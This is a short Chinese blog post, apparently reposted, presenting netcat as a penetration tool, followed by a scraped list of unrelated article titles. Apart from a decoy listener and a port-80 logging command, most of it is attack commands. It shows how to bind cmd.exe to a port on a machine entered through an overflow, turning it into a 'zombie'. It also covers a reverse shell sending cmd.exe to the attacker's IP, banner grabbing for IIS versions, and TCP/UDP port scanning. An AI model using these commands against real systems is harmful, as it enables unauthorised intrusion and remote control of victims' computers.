渗透测试:nc端口转发或反向转发
来源:互联网 发布:中国铁塔 网络强国 编辑:程序博客网 时间:2024/04/26 22:02
我就知道这么些参数 了:
第一个:
nc -l -v -p 7626
这就是打开本地的7626端口进行监听,并反馈连接信息这样如果有扫描冰河木马的人会认为你中了木马开放了7626,和“小猪快跑”的功能有点象,再加个批处理文件一起用的话就是一个“小猪快跑”了.
如果要监视是否有入侵本地80端口的行为,并记下来,用这个命令:
nc -l -p 80 >>c://日志.dat
这样,凡是有针对本机80端口的攻击都会被记录下来的.
二、
如果你通过溢出进入了别人的机器,就可以运行:
nc -l -p 123 -e cmd.exe
或者是: nc -l -p 123 -t
作用都是以cmd.exe来响应到机器上123端口的连接.
这样就把溢出的主机变成了一台telnet肉鸡了!
你也可一用命令让肉鸡主动连接你的主机,假设我的IP是192.168.0.1 .
在肉鸡上运行: nc -e cmd.exe 192.168.0.1 777
再在本地机器上运行: nc -l -p 777
意思是让肉鸡将cmd.exe(就是个shell)主动响应到你电脑的777端口。
你再在本地机上监听777端口,这样就进入了对方的cmd了。
这也微十时毫 反弹端口式木马的原理了。
三、
用这个命令:
nc -v 192.168.0.25 80
就获得了192.168.0.25的80端口的信息。
可以获得IIS版本等很多重要信息 的 。
四、
你也可以将NC作为扫描器使用:
nc -v -z 192.168.0.25 1-100
扫描192.168.0.25的1到100间的TCP端口
用nc -v -z -u 192.168.0.25 1-100
这是扫描1到00间的UDP端口。
- 渗透测试:nc端口转发或反向转发
- [渗透测试] 端口转发
- linux nc 端口转发
- iptables端口映射或端口转发
- iptables 端口转发 (反向代理原型)
- 端口转发
- 端口转发
- 端口转发
- 端口转发
- 端口转发
- 端口转发
- 端口转发
- 端口转发
- 对内网有端口转发的域的渗透
- 渗透辅助利器:端口转发工具源码解析
- 内网渗透笔记-端口转发,内网代理
- NC渗透测试
- 使用 ssh -R 建立反向/远程TCP端口转发代理
- Android代码混淆报错
- Error:(2, 0) Plugin with id 'com.github.dcendents.android-maven' not found
- 使用数组实现队列(C语言)
- Article - Physically Based Rendering
- 已安装了存在签名冲突的同名数据包
- 渗透测试:nc端口转发或反向转发
- leetcode 2:Add Two Numbers
- 多行文本垂直居中
- 弹出遮罩层后禁止滚动效果【实现代码】
- JDBC数据库基本操作
- Linux服务器定位CPU高占用率代码位置经历
- 验证码类和分页类
- mongoVUE使用
- 设计模式——适配器模式(Adapter)